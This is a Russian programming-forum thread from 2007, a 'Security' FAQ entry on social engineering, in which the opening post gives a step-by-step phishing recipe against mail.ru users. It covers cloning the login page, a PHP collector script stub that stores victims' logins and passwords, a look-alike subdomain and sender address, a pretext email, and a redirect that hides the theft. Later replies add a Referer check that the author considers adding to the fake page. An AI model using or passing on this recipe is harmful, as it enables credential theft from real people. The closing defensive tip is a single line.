ФорумПрограммированиеПыхнуть хотите?F.A.Q. → Безопасность.Часть 3.Социальная инженерия

Безопасность.Часть 3.Социальная инженерия

  • cage

    Сообщения: 429 Репутация: N Группа: Кто попало

    Spritz 20 августа 2007 г. 22:44

    1)
    Название : Социальная инженерия(СИ)
    Оценка: 7 баллов
    Краткий обзор :
    Существует много статей на эту ,ставшую в последнее время очень модной,тему.Что же представляет из себя социальная инженерия?К примеру Вася знает пароль к почте Ани,а Саша хочет этот пароль узнать.Но не может же он подойти к Ане и спросить ее о пароле..может ему влом,а может просто боится лишнего средство освещения под глазом,поэтому он подходит к Васе(попутно брату Ани) дает ему конфетку(или,что еще хуже,пи#дюлей) и узнает пароль!Вот и все!
    Применение приема СИ:
    СИ в мире web применяется очень часто,это обусловлено крайне низким уровнем обитающего тут населения,а когда это население доверчиво,результат может стать крайне отрицательным.Для них.Опишу случай сверху без применения спецоперации "Конфетка"("Пи#дюли").
    Предположим,что у Ани следующая почта [email protected]Регистрируем на бесплатном провайдере pupkin.ru следующий домен : servicemail.pupkin.ru.Затем заходим на mail.ru сохраняем страницу на компьютер под названием index.html,и немного отредактируем этот файл.Action формы отправки логина и пароля меняем на cageperexvat.php.Затем создаем скрипт под названием cageperexvat.php следующего содержания

    <?php
    //в зависимости от свойтства method формы в коде будет или POST или GET
    $login = $_POST['login'];
    $password = $_POST['password'];
    $domain = $_POST['domain'];
    //код подключения к базе данных,предоставляемой
    // провайдером,создание таблицы с 3 полями
    //и последующим занесением туда переменных $login,$password,$domain
    ?>

    Затем создаем файл show.php,делающий выборку из БД и отображающей ее в браузере,попутно заливаем все эти 3 файла на servicemail.pupkin.ru
    Остается последнее.Регистрируем почту с замысловато-умным названием [email protected],
    отправляем на почту жертвы письмо,что,мол,произошла утечка транзакций из экспоненциальных структур полиморфных концепций нашей БД,просим,гражданочка,пройти по данному адресу servicemail.pupkin.ru и повторить залогинивание для подтверждения ваших прав
    Жертва по инерции заходит регистрируется и заного появляется уже на mail.ru(для этого после успешной записи в БД сделайте редирект на mail.ru)
    Ву а ля!Пароли у вас в БД!Смотрите на здоровье.

    Меры защиты:Никогда не ходите по подозрительным ссылкам,просящих вас зарегистрироваться,и обещающим вам ванильные небеса,также всегда смотрите на URL,по которым вас ведут,в общем,,граждане будьте бдительны!


    to be continued…
  • cage

    Сообщения: 429 Репутация: N Группа: Кто попало

    Spritz 21 августа 2007 г. 3:39, спустя 4 часа 54 минуты 40 секунд

    Со временем я буду дополнять этот топ приемами СИ
  • ghost

    Сообщения: 883 Репутация: N Группа: Джедаи

    Spritz 21 августа 2007 г. 3:46, спустя 7 минут 24 секунды

    про метод - не спортивно) хотя и действенно..
    головой надо думать товарисчи, и будет вам счастье)
  • cage

    Сообщения: 429 Репутация: N Группа: Кто попало

    Spritz 21 августа 2007 г. 3:50, спустя 3 минуты 12 секунд

    меня она почему то больше привлекает))не знаю почему
  • adw0rd

    Сообщения: 22905 Репутация: N Группа: в ухо

    Spritz 21 августа 2007 г. 3:55, спустя 5 минут 8 секунд

    Метод который ты описал это скорее ФИШИНГ, один из методов СИ.

    Существует много статей на эту ,ставшую в последнее время очень модной,тему.

    Винда приютила неграмотных людей и поэтому все больше юзеров ведутся на это.

    Несомненно самый известный спец по СИ Кевин Девид Митник или просто Кевин Митник :)
    он именно самый известный, а не лучший, был бы лучший не поймали бы :)
    Кстати, можно посмотреть \"Хакеры 2 - Operation Takedown\" там более менее правдиво описана история Митника и Шимомуры :)

    Кстати ФИШИНГ и СИ это реалия… Иногда удивляешься как ведутся люди!
    adw/0
  • cage

    Сообщения: 429 Репутация: N Группа: Кто попало

    Spritz 21 августа 2007 г. 3:57, спустя 2 минуты 34 секунды

    Мы статьи пишем,работаем даааа!!!!))))
  • Patrick

    Сообщения: 506 Репутация: N Группа: Кто попало

    Spritz 21 августа 2007 г. 4:13, спустя 16 минут 9 секунд

    бред какой-то - на журнал "хакер" похоже….
  • cage

    Сообщения: 429 Репутация: N Группа: Кто попало

    Spritz 21 августа 2007 г. 4:17, спустя 3 минуты 24 секунды

    а тебе журнал хакер на яйца наступил?
  • Patrick

    Сообщения: 506 Репутация: N Группа: Кто попало

    Spritz 21 августа 2007 г. 4:25, спустя 8 минут 21 секунду


    а тебе журнал хакер на яйца наступил?

    с яйцами у меня всё в поряде :)
    а реферер проверить слабо?
  • cage

    Сообщения: 429 Репутация: N Группа: Кто попало

    Spritz 21 августа 2007 г. 4:27, спустя 1 минуту 34 секунды

    как я рад за тебя)))
    в смысле?
  • Patrick

    Сообщения: 506 Репутация: N Группа: Кто попало

    Spritz 21 августа 2007 г. 4:38, спустя 11 минут 5 секунд

    к примеру:
    /оrder.php

    <form action="/send.php">

    </form>

    /send.php

    <?php
    if('http://exemple.com/order.php' == $_SERVER['HTTP_REFERER'] or 'http://www.exemple.com/order.php' == $_SERVER['HTTP_REFERER'] )
    {
    // Обрабатываем данные формы
    }else{
    // вырабатывает ошибку
    }
    ?>

  • cage

    Сообщения: 429 Репутация: N Группа: Кто попало

    Spritz 21 августа 2007 г. 4:43, спустя 5 минут 18 секунд

    я не думаю ,что на этот сайт зайдут автономно))проверять реферер нет особой необходимости,хотя идея конечно хорошая,и вставить этот код имеет смысл

Пожалуйста, авторизуйтесь, чтобы написать комментарий!